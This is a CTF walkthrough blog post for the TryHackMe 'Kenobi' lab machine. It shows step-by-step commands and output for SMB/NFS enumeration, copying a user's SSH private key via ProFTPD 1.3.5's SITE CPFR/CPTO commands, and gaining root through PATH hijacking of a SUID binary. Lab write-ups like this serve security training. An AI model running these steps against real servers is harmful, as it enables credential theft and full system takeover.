Kenobi Writeup - TryHackMe
Welcome to the writeup of Kenobi room from TryHackMe - CTF.
Welcome to the writeup of Kenobi room from TryHackMe.
It's another room from a famous franchise (Star Wars), but it's lesss themed than the Biohazard room - here is my Biohazard Walkthrough - so this will be a direct wireteup.
Here we go...
"Description: This room will cover accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary."
IP: 10.10.128.132
Enumeration
sudo nmap -v -sSV -Pn 10.10.128.132 -oN nmap/scan
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
There is some ports that we could identify with NMAP, but we will not stop here with the NMAP... let's use some scripts
Nmap - SMB
sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.128.132 -oN nmap/smb
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.128.132\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.128.132\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.128.132\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)With "smb-enum" scritps, we could found shares that we can try to access and explore using smbclient.
smbclient //10.10.128.132/anonymous
dir
. D 0 Wed Sep 4 03:49:09 2019
.. D 0 Wed Sep 4 03:56:07 2019
log.txt N 12237 Wed Sep 4 03:49:09 2019
get log.txt
cat log.txt --> return SSH keyExploring this "configuration" we got some interesting informations about a SSH key and the FTP server through the log.txt file.
Nmap - RPC
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.128.132
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836524.0 6877104.0 22% 16.0T 32000With "nfs" scripts, we could enumerate a network file system and now we can try to mount it.
Exploitation
Through the ProFTPd version running on the server we could explore a module using the "SITE CPFR" and "SITE CPTO" commands, which can be used to copy files/directories from one place to another on the server. Using the information existing in log.txt was possible to determine the location of the SSH key and copy it to the mount share.
|
nc -v 10.10.128.132 21
Connection to 10.10.128.132 21 port [tcp/ftp] succeeded!
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.128.132]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successfulAfter explored and copied the SSH key to the file where we have access through the mount, we can mount the share and have a direct access to the key.
mkdir /mnt/kenobiNFS
sudo mount 10.10.128.132:/var mnt/kenobiNFS/
cd mnt/kenobiNFS/tmpNow we can log in the server using the SSH key.
sudo chmod 600 id_rsa
ssh kenobi@10.10.128.132 -i id_rsa
kenobi@kenobi:~$ wc -c user.txt
33 user.txtWith the access in the machine as "Kenobi" user, was possible to found the "user flag".
Privilege Escalation
Checking for misconfigurations to privilege escalation we found the binary /user/bin/menu as SUID, what allows us to use it as root.
find / -perm -u=s -type f 2>/dev/null
|
But we need to know how the binary works to exlore it. So, let's run it.
|
He appear to call some commands as "curl" and "ifconfig" in the respective options "1" and "3" and running running without a full path (/usr/bin/curl). So we can configure the PATH variable stating a path that we have control to create an "archive" with the same command name called for the script /usr/bin/menu, but with another function/code :D
Example:
cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menuHow this binary run as root (SUID), the command "/bin/sh or /bin/bash" (in our file and defined path) will be run as root too... With that, choosing the option referring to the generated file we become root \o/
|
Now we have full control of this machine and is possible to read the root flag at /root/root.txt.
|
Thanks for reading and feel free to pingback a coffee ;D
naP0